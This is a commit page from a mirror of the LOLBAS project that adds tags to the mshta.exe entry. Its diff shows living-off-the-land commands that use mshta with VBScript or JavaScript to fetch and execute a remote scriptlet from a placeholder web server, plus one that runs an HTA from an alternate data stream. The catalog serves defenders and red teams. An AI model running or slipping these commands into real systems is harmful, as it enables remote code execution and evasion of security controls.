public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-01-02 10:07:01 +01:00
Code Issues Projects Releases Wiki Activity

Update Mshta.yml Tags

Browse Source 
Added Tags:
Execute: Remote
Input Custom Format
Execute JScript
Execute VBScript
This commit is contained in:
hegusung 2024-10-13 16:03:39 +02:00 committed by GitHub
parent b8d98f067d
commit bd07c4dd24
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 6 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
yml/OSBinaries/Mshta.yml
View File

@ -13,6 +13,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: WSH
- Execute: Remote
- Input: Custom Format
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument. Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code Usecase: Execute code
@ -20,6 +22,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: VBScript
- Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
Description: Executes JavaScript supplied as a command line argument. Description: Executes JavaScript supplied as a command line argument.
Usecase: Execute code Usecase: Execute code
@ -27,6 +31,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: mshta.exe "C:\ads\file.txt:file.hta" - Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream Usecase: Execute code hidden in alternate data stream